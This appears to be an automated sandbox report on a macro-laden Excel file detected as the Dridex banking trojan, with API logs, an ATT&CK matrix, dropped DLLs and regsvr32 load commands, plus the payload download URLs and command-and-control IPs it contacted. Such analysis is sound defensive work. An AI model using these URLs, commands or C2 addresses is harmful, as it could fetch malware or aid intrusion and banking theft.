Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -254000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -132000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -316000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -278000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -155000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -301000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -134000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -165000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -171000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -156000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -241000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -144000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -326000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -322000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -159000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1976Thread sleep time: -281000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2472Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -152000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -260000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -344000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -144000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -148000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -307000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -308000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -338000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -305000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -326000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -246000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -298000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -492000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -302000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -340000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -292000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -161000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -330000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -126000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -267000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -157000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -241000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -320000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -129000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -255000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -128000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -142000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -322000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -177000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -121000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -276000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -312000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -159000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -127000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -317000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -132000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -242000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -176000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -168000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -301000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -145000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -270000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -138000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -349000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -125000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -170000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -257000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -327000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -139000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -283000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -158000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -135000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -279000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -162000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -278000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -155000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -149000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -261000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2768Thread sleep time: -173000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CDCEF8 FindFirstFileExW,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004ECEF8 FindFirstFileExW,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CC3930 GetTokenInformation,GetTokenInformation,GetSystemInfo,GetTokenInformation,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_001F88DD rdtsc
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CC6C50 LdrLoadDll,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0021B5D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0021B6E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CC7A60 RtlAddVectoredExceptionHandler,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004D7A60 RtlAddVectoredExceptionHandler,

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 157.7.166.26 233
Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 195.231.69.151 49
Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 221.126.244.72 187
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\pgjasrqd.dll.
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\ndrztpo.dll.
Source: regsvr32.exe, 00000003.00000002.2385426896.0000000000A20000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2386762795.0000000000F80000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2385254744.00000000008F0000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2386448595.0000000000F80000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: regsvr32.exe, 00000003.00000002.2385426896.0000000000A20000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2386762795.0000000000F80000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2385254744.00000000008F0000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2386448595.0000000000F80000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000003.00000002.2385426896.0000000000A20000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2386762795.0000000000F80000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2385254744.00000000008F0000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2386448595.0000000000F80000.00000002.00000001.sdmpBinary or memory string: !Progman
Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CC2980 GetUserNameW,
Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting32Path InterceptionProcess Injection112Masquerading11OS Credential DumpingQuery Registry1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution43Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemorySecurity Software Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection112Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer13Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting32NTDSProcess Discovery11Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsAccount Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol23Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonRegsvr321Cached Domain CredentialsSystem Owner/User Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Network Configuration Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowFile and Directory Discovery2Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingSystem Information Discovery24Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 339173 Sample: sample20210113-01.xlsm Startdate: 13/01/2021 Architecture: WINDOWS Score: 100 44 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->44 46 Multi AV Scanner detection for domain / URL 2->46 48 Found malware configuration 2->48 50 10 other signatures 2->50 7 EXCEL.EXE 243 68 2->7         started        process3 dnsIp4 38 bipolarmalta.mccarthy.ws 35.214.225.210, 49165, 80 GOOGLE-2US United States 7->38 40 oudtshoornpharmacies.co.za 154.66.197.71, 49166, 80 DIAMATRIXZA South Africa 7->40 42 sendgrid.invoteqleads.com 104.24.124.127, 49169, 80 CLOUDFLARENETUS United States 7->42 24 C:\Users\user\AppData\Local\...\pgjasrqd.dll, PE32 7->24 dropped 26 C:\Users\user\AppData\Local\...\ndrztpo.dll, PE32 7->26 dropped 28 C:\Users\user\AppData\...\lpxtpiw[1].zip, PE32 7->28 dropped 30 2 other malicious files 7->30 dropped 56 Document exploit detected (creates forbidden files) 7->56 58 Document exploit detected (process start blacklist hit) 7->58 60 Document exploit detected (UrlDownloadToFile) 7->60 12 regsvr32.exe 7->12         started        14 regsvr32.exe 7->14         started        16 regsvr32.exe 7->16         started        file5 signatures6 process7 process8 18 regsvr32.exe 11 12->18         started        22 regsvr32.exe 9 14->22         started        dnsIp9 32 157.7.166.26, 49172, 49174, 49178 INTERQGMOInternetIncJP Japan 18->32 34 221.126.244.72, 443, 49167, 49170 HUTCHISON-AS-APHGCGlobalCommunicationsLimitedHK Hong Kong 18->34 36 195.231.69.151, 3889, 49171, 49173 ARUBA-CLOUDIT Italy 18->36 52 Detected Dridex e-Banking trojan 18->52 54 System process connects to network (likely due to code injection or exploit) 22->54 signatures10

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
sample20210113-01.xlsm25%VirustotalBrowse
sample20210113-01.xlsm11%ReversingLabsScript-Macro.Trojan.Wacatac

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\ndrztpo.dll100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\pgjasrqd.dll100%Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\dyu828kp[1].rar100%Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lpxtpiw[1].zip100%Joe Sandbox ML

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
sendgrid.invoteqleads.com0%VirustotalBrowse
bipolarmalta.mccarthy.ws0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://ocsp.entrust.net030%URL Reputationsafe
http://ocsp.entrust.net030%URL Reputationsafe
http://ocsp.entrust.net030%URL Reputationsafe
http://ocsp.entrust.net030%URL Reputationsafe
https://221.126.244.72/30%Avira URL Cloudsafe
http://bipolarmalta.mccarthy.ws/lpxtpiw.zip6%VirustotalBrowse
http://bipolarmalta.mccarthy.ws/lpxtpiw.zip0%Avira URL Cloudsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
https://157.7.166.26:5353/0%Avira URL Cloudsafe
https://221.126.244.72/O0%Avira URL Cloudsafe
http://sendgrid.invoteqleads.com/usc3d1.rar0%Avira URL Cloudsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
https://221.126.244.72/0%Avira URL Cloudsafe
https://157.7.166.26/0%Avira URL Cloudsafe
https://195.231.69.151:3889/G0%Avira URL Cloudsafe
https://195.231.69.151/c70%Avira URL Cloudsafe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
https://195.231.69.151:3889/0%Avira URL Cloudsafe
http://crl.microsoft.v&0%Avira URL Cloudsafe
http://ocsp.entrust.net0D0%URL Reputationsafe
http://ocsp.entrust.net0D0%URL Reputationsafe
http://ocsp.entrust.net0D0%URL Reputationsafe
https://195.231.69.151/0%Avira URL Cloudsafe
https://195.231.69.151:3889/hy0%Avira URL Cloudsafe
http://servername/isapibackend.dll0%Avira URL Cloudsafe
https://195.231.69.151/d70%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
sendgrid.invoteqleads.com
104.24.124.127
truefalseunknown
bipolarmalta.mccarthy.ws
35.214.225.210
truefalseunknown
oudtshoornpharmacies.co.za
154.66.197.71
truefalse
    		high

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://bipolarmalta.mccarthy.ws/lpxtpiw.ziptrue
    • 6%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    http://sendgrid.invoteqleads.com/usc3d1.rarfalse
    • Avira URL Cloud: safe
    		unknown
    http://oudtshoornpharmacies.co.za/dyu828kp.rarfalse
      		high

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://crl.entrust.net/server1.crl0regsvr32.exe, 00000004.00000002.2385270128.000000000065A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpfalse
        		high
        http://ocsp.entrust.net03regsvr32.exe, 00000004.00000002.2385270128.000000000065A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        https://221.126.244.72/3regsvr32.exe, 00000004.00000002.2385192060.00000000005CF000.00000004.00000020.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0regsvr32.exe, 00000004.00000002.2385230129.000000000061A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        https://157.7.166.26:5353/regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://221.126.244.72/Oregsvr32.exe, 00000004.00000002.2385192060.00000000005CF000.00000004.00000020.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://www.diginotar.nl/cps/pkioverheid0regsvr32.exe, 00000004.00000002.2385270128.000000000065A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        https://221.126.244.72/regsvr32.exe, 00000004.00000002.2385290882.0000000000671000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385411279.0000000000591000.00000004.00000020.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://157.7.166.26/regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://195.231.69.151:3889/Gregsvr32.exe, 00000004.00000002.2385230129.000000000061A000.00000004.00000020.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://195.231.69.151/c7regsvr32.exe, 00000004.00000002.2385290882.0000000000671000.00000004.00000020.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0regsvr32.exe, 00000004.00000002.2385270128.000000000065A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        http://www.%s.comPAregsvr32.exe, 00000004.00000002.2386925336.0000000002380000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2386727384.0000000002380000.00000002.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        		low
        https://195.231.69.151:3889/regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://crl.microsoft.v&regsvr32.exe, 00000004.00000002.2385290882.0000000000671000.00000004.00000020.sdmpfalse
        • Avira URL Cloud: safe
        		low
        http://ocsp.entrust.net0Dregsvr32.exe, 00000004.00000002.2385270128.000000000065A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        https://195.231.69.151/regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://195.231.69.151:3889/hyregsvr32.exe, 00000004.00000002.2385230129.000000000061A000.00000004.00000020.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://secure.comodo.com/CPS0regsvr32.exe, 00000004.00000002.2385270128.000000000065A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpfalse
          		high
          http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.2385462250.0000000001E20000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2385318587.0000000000690000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2385314469.0000000001CF0000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2385487805.00000000009B0000.00000002.00000001.sdmp, regsvr32.exe, 00000007.00000002.2117872818.0000000001CF0000.00000002.00000001.sdmpfalse
          • Avira URL Cloud: safe
          		low
          https://195.231.69.151/d7regsvr32.exe, 00000004.00000002.2385290882.0000000000671000.00000004.00000020.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://crl.entrust.net/2048ca.crl0regsvr32.exe, 00000004.00000002.2385270128.000000000065A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpfalse
            		high

            Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public

            IPDomainCountryFlagASNASN NameMalicious
            195.231.69.151
            		unknownItaly
            		202242ARUBA-CLOUDITtrue
            154.66.197.71
            		unknownSouth Africa
            		327979DIAMATRIXZAfalse
            104.24.124.127
            		unknownUnited States
            		13335CLOUDFLARENETUSfalse
            35.214.225.210
            		unknownUnited States
            		19527GOOGLE-2USfalse
            157.7.166.26
            		unknownJapan7506INTERQGMOInternetIncJPtrue
            221.126.244.72
            		unknownHong Kong
            		9304HUTCHISON-AS-APHGCGlobalCommunicationsLimitedHKtrue

            General Information

            Joe Sandbox Version:31.0.0 Red Diamond
            Analysis ID:339173
            Start date:13.01.2021
            Start time:16:38:00
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 9m 19s
            Hypervisor based Inspection enabled:false
            Report type:light
            Sample file name:sample20210113-01.xlsm
            Cookbook file name:defaultwindowsofficecookbook.jbs
            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
            Number of analysed new started processes analysed:9
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • GSI enabled (VBA)
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal100.bank.expl.evad.winXLSM@11/18@3/6
            EGA Information:Failed
            HDC Information:
            • Successful, ratio: 32.5% (good quality ratio 32.3%)
            • Quality average: 80.3%
            • Quality standard deviation: 18.5%
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 0
            • Number of non-executed functions: 0
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .xlsm
            • Found Word or Excel or PowerPoint or XPS Viewer
            • Attach to Office via COM
            • Scroll down
            • Close Viewer
            Warnings:
            Show All
            • Exclude process from analysis (whitelisted): dllhost.exe
            • TCP Packets have been reduced to 100
            • Excluded IPs from analysis (whitelisted): 2.20.142.209, 2.20.142.210, 8.253.95.249, 67.26.137.254, 8.248.113.254, 67.27.233.126, 8.253.95.120
            • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, auto.au.download.windowsupdate.com.c.footprint.net, au-bg-shim.trafficmanager.net
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtCreateFile calls found.
            • Report size getting too big, too many NtDeviceIoControlFile calls found.
            • Report size getting too big, too many NtEnumerateValueKey calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryAttributesFile calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Report size getting too big, too many NtSetInformationFile calls found.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            16:38:51API Interceptor1699x Sleep call for process: regsvr32.exe modified

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            195.231.69.151og0gax.dllGet hashmaliciousBrowse
              M1OrQwls8C.dllGet hashmaliciousBrowse
                154.66.197.711 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                • davidsarmoury.co.za/pwux2gh.zip

                Domains

                No context

                ASN

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                GOOGLE-2USinfo_2020_NJY_31940448.docGet hashmaliciousBrowse
                • 35.208.69.64
                PO#218740.exeGet hashmaliciousBrowse
                • 35.208.174.213
                Consignment Document PL&BL Draft.exeGet hashmaliciousBrowse
                • 35.214.23.27
                Consignment Details.exeGet hashmaliciousBrowse
                • 35.208.179.96
                S4P1JiBZIZxvtFR.exeGet hashmaliciousBrowse
                • 35.214.203.1
                Archivo_29_48214503.docGet hashmaliciousBrowse
                • 35.214.169.246
                info.docGet hashmaliciousBrowse
                • 35.208.84.24
                Adjunto 29 886_473411.docGet hashmaliciousBrowse
                • 35.209.78.196
                Informacion_29.docGet hashmaliciousBrowse
                • 35.214.169.246
                Informacion_29.docGet hashmaliciousBrowse
                • 35.209.78.196
                form.docGet hashmaliciousBrowse
                • 35.214.199.246
                Nuevo pedido.exeGet hashmaliciousBrowse
                • 35.209.33.122
                Info_122020.docGet hashmaliciousBrowse
                • 35.208.84.24
                84-2020-98-6493170.docGet hashmaliciousBrowse
                • 35.208.104.82
                rib.exeGet hashmaliciousBrowse
                • 35.209.110.77
                rep_2020_12_29_N918980.docGet hashmaliciousBrowse
                • 35.208.69.64
                Adjunto.docGet hashmaliciousBrowse
                • 35.214.159.46
                Messaggio-3012-2020.docGet hashmaliciousBrowse
                • 35.214.159.46
                Documento-2912-122020.docGet hashmaliciousBrowse
                • 35.208.84.24
                Documento_I_2612.docGet hashmaliciousBrowse
